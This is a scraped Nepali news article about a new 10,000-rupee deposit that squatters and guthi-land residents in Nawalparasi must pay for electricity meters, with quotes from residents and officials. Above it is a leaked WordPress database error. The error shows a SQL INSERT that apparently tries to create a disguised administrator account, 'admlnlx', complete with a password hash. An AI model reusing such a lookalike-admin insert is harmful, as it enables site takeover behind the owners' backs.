WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bhf08pVGbYB4UCloCC3ODyk7ewU7Lg1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 07:11:31', '', 'admlnlx', 'admlnlx')
नवलपरासी, पुस ७ –
सुकुम्बासी तथा गुठी लगायतको जग्गामा बसोबास गर्ने बासिन्दाले घरमा विद्युत मिटर जडान गर्न १० हजार रुपैयाँ धरौटी राख्नुपर्ने भएको छ ।
जग्गा धनी प्रमाण पत्र नभएकाले विद्युत चोरी गरी प्रयोग गर्ने भएपछि नेपाल विद्युत प्राधिकरण सञ्चालक समितिको बैठकले धरौटी राख्नुपर्ने निर्णय गरेको हो ।
जग्गाको पुर्जा नहुँदा मिटर राख्न नपाएका नवलपरासी कावासोती–१३ का बासिन्दाले भने धरौटी राख्ने व्यवस्था राम्रो भएपनि पैसा महंगो भएको गुनासो गरेका छन् । स्थानीय बासिन्दा धनमाया महत्तो भन्नुहुन्छ, ‘मिटर नराख्दा विद्युत चेरेको जस्तो देखिने, पैसा तिरेर बाल्छौँ भन्दा धरौटी नै धेरै भएकोले अफ्ठ्यारो भएको छ ।’
नवलपरासीको कावासोती–१३ बुढौलीकुनाका १७ घरको जग्गाधनी प्रमाण पत्र पनि छैन । उनीहरुलाई बिजुली पनि छैन । ‘विद्युत मिटर चाहियो भन्दा धरौटीको कुरा आएको छ हामी सुकुम्बासीले १० हजार रुपैयाँ कसरी जुटाउने’ स्थानीय बासिन्दा ओममाया गाहाले भन्नुभयो ।
नेपाल विद्युत प्राधिकरण वितरण केन्द्र कावासोतीका प्रमुख उमेशप्रसाद यादवले नगरपालिकाले सिफारिस गरे मिटर जडान गरिदने बताउनुभयो । नगरपालिकाले गर्ने सिफारिसमा बसोबास गरेको घर जग्गा व्यक्तिको निजी हो भन्ने ब्यहोरा नभएकाले सिफारिस गर्न नसकिएको कावासोती नगरपालिकाले जनाएको छ ।
विद्युत चुहावट रोक्ने अभियान अन्तर्गत सुकुम्बासी र गुठीको जग्ग्मामा घर भएकालाई विद्युत मिटर दिनका लागि धरौटीको व्यवस्था गरेको यादवले जानकारी दिनुभयो । ‘टहरामा बस्नेलाई पनि हामी मिटर दिन्छौँ तर धरौटी त राख्नु पर्र्यो नि’ यादवले भन्नुभयो ।